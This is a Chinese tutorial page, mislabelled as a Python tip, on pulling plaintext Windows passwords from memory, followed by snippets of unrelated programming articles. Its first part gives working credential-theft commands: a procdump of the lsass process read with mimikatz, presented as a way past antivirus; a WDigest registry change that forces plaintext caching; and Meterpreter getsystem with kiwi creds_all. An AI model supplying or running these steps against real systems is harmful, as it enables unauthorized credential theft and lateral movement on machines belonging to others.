python简单直接获取windows明文密码操作技巧

目录
  • 01、Procdump+Mimikatz
  • 02、Window 2012 R2抓取密码
  • 03、MSF kiwi模块

01、Procdump+Mimikatz

利用procdump+Mimikatz 绕过杀软获取Windows明文密码。

(1)工具准备:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密码

在目标机器上生成存储文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如图:成功从内存中提取明文密码。

02、Window 2012 R2抓取密码

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

(1)修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用户administrator注销后重新登录,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

03、MSF kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加载kiwi模块:

load kiwi

列举系统中的明文密码:

creds_all

以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于python获取windows明文密码的资料请关注我们其它相关文章!

时间: 2021-10-14

Python实现密钥密码(加解密)实例详解

密钥密码 ''' 如密钥短语密码为: university -> universty 明文: abcdefghijklmnopqrstuvwxyz 密文:jklmopqwxzuniverstyabcdfgh ''' 构造映射字典 # 构造映射 asc ---> crypt def dic(x): list_x =[] list_z = [] for i in x: list_x.append(ord(i)) for i in range(97,123): if i not in list_x:

使用Python实现windows下的抓包与解析

系统环境:windows7,选择windows系统是因为我对自己平时日常机器上的流量比较感兴趣 python环境:python2.7 ,这里不选择python3的原因,是因为接下来要用到的scapy包在python3中安装较于python2要麻烦得多.如果你习惯于用python3,数据包的分析完全可以放在3下面做,因为抓包和分析是两个完全独立的过程. 需要的python包:scapy和dpkt 抓包代码: from scapy.sendrecv import sniff from scapy.u

Python实现的远程登录windows系统功能示例

本文实例讲述了Python实现的远程登录windows系统功能.分享给大家供大家参考,具体如下: 首先安装wmi 命令: pip install wmi 然后会报错缺少pywin32-219.win-amd64-py2.7.exe包,去下面这个地址下载 http://sourceforge.net/projects/pywin32/files/pywin32/ 寻找适合自己电脑位数和python的包下载安装 下面是远程连接的代码: # -*- coding:utf-8 -*- #! python

Python实现最常见加密方式详解

前言 我们所说的加密方式,都是对二进制编码的格式进行加密的,对应到Python中,则是我们的Bytes. 所以当我们在Python中进行加密操作的时候,要确保我们操作的是Bytes,否则就会报错. 将字符串和Bytes互相转换可以使用encode()和decode()方法.如下所示: # 方法中不传参数则是以默认的utf-8编码进行转换In [1]: '南北'.encode()Out[1]: b'\xe5\x8d\x97\xe5\x8c\x97'In [2]: b'\xe5\x8d\x97\xe

Python使用getpass库读取密码的示例

有这样一个经历,服务器挂掉了,请工程师维护,为了安全,工程师进行核心操作时,直接关掉显示器进行操作,完成后,再打开显示器,进行收尾工作... 密码 这个经历告诉我们: 为了安全,核心的操作是不可见的 在某些情况下,显示器可以忽略... 在Linux系统中,在终端输入密码时,是不显示密码位数的(不回显) 早些年,计算机的数量很少,会出现一个人操作计算机,背后一群人围观,被人看到输入密码的位数,就会导致安全问题,于是,采用不回显密码的方式解决问题(密码不回显,你的手指做几个假动作,别人就很难看到你的

Python使用configparser库读取配置文件

这篇文章主要介绍了Python使用configparser库读取配置文件,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 背景: 在写接口自动化框架,配置数据库连接时,测试环境和UAT环境的连接信息不一致,这时可以将连接信息写到conf或者cfg配置文件中 python环境请自行准备. python代码直接封装成类,方便其他模块的引入. from configparser import ConfigParser class DoConfig: d

Python利用turtle库绘制彩虹代码示例

语言:Python IDE:Python.IDE 需求 做出彩虹效果 颜色空间 RGB模型:光的三原色,共同决定色相 HSB/HSV模型:H色彩,S深浅,B饱和度,H决定色相 需要将HSB模型转换为RGB模型 代码示例: #-*- coding:utf-8 –*- from turtle import * def HSB2RGB(hues): hues = hues * 3.59 #100转成359范围 rgb=[0.0,0.0,0.0] i = int(hues/60)%6 f = hues/

Python实现的凯撒密码算法示例

本文实例讲述了Python实现的凯撒密码算法.分享给大家供大家参考,具体如下: 一 介绍 凯撒密码是一种非常古老的加密方法,相传当年凯撒大地行军打仗时为了保证自己的命令不被敌军知道,就使用这种特殊的方法进行通信,以确保信息传递的安全.他的原理很简单,说到底就是字母于字母之间的替换.下面让我们看一个简单的例子:"baidu"用凯撒密码法加密后字符串变为"edlgx",它的原理是什么呢?把"baidu"中的每一个字母按字母表顺序向后移3位,所得的结果

使用python的pandas库读取csv文件保存至mysql数据库

第一:pandas.read_csv读取本地csv文件为数据框形式 data=pd.read_csv('G:\data_operation\python_book\chapter5\\sales.csv') 第二:如果存在日期格式数据,利用pandas.to_datatime()改变类型 data.iloc[:,1]=pd.to_datetime(data.iloc[:,1]) 注意:=号,这样在原始的数据框中,改变了列的类型 第三:查看列类型 print(data.dtypes) 第四:方法一

Python使用pyshp库读取shapefile信息的方法

通过pyshp库,可以读写Shapefile文件,查询相关信息,github地址为 https://github.com/GeospatialPython/pyshp#reading-shapefile-meta-data import shapefile # 使用pyshp库 file = shapefile.Reader("data\\市界.shp") shapes = file.shapes() # <editor-fold desc="读取元数据"&g

Python实现的维尼吉亚密码算法示例

本文实例讲述了Python实现的维尼吉亚密码算法.分享给大家供大家参考,具体如下: 一 代码 # -*- coding:utf-8 -*- #key='relations' #plaintext='tomorrowiwillhaveagood' print("我们测试结果:") key='helloworld' plaintext=raw_input('请输入明文:') ascii='abcdefghijklmnopqrstuvwxyz' keylen=len(key) ptlen=l

python中mechanize库的简单使用示例

复制代码 代码如下: #!/usr/bin/env/ python#coding=utf-8import mechanizeimport cookielib # Cookie Jarcj = cookielib.LWPCookieJar() # Browserbr = mechanize.Browser()br.set_cookiejar(cj) # Browser optionsbr.set_handle_equiv(True)br.set_handle_gzip(True)br.set_ha

python中pandas库中DataFrame对行和列的操作使用方法示例

用pandas中的DataFrame时选取行或列: import numpy as np import pandas as pd from pandas import Sereis, DataFrame ser = Series(np.arange(3.)) data = DataFrame(np.arange(16).reshape(4,4),index=list('abcd'),columns=list('wxyz')) data['w'] #选择表格中的'w'列,使用类字典属性,返回的是S

python批量修改交换机密码的示例

1.通过pip安装python第三方模块paramiko pip install paramiko 2.创建脚本 ##导入paramiko.time.getpass模块 #!/usr/bin/python import paramiko import time import getpass ##通过raw_input()函数获取用户输入的SSH用户名并赋值给username username = raw_input('Username:') ##通过getpass模块中的getpass()函数获